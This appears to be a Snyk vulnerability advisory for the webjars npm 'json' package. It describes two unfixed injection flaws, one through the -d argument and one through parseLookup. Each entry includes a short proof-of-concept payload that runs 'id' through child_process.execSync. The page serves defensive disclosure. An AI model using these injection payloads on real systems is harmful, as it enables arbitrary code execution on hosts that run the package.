org.webjars.npm:json@9.0.6 vulnerabilities

  • latest version

    9.0.6

  • first published

    7 years ago

  • latest version published

    7 years ago

  • licenses detected

  • package manager

Direct Vulnerabilities

Known vulnerabilities in the org.webjars.npm:json package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Arbitrary Code Injection

org.webjars.npm:json is an a 'json' command for massaging and processing JSON on the command line

Affected versions of this package are vulnerable to Arbitrary Code Injection via the -d argument.

PoC

curl -sL 'https://api.github.com/repos/joyent/node/issues?state=open' | node_modules/json/lib/json.js -a created_at number title -d '""+require(`child_process`).execSync(`id`)//'

How to fix Arbitrary Code Injection?

There is no fixed version for org.webjars.npm:json.

[0,)
  • H
Command Injection

org.webjars.npm:json is an a 'json' command for massaging and processing JSON on the command line

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbritary commands using the parseLookup function.

PoC

const json = require('json');

res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]}');
console.log(res);

How to fix Command Injection?

There is no fixed version for org.webjars.npm:json.

[0,)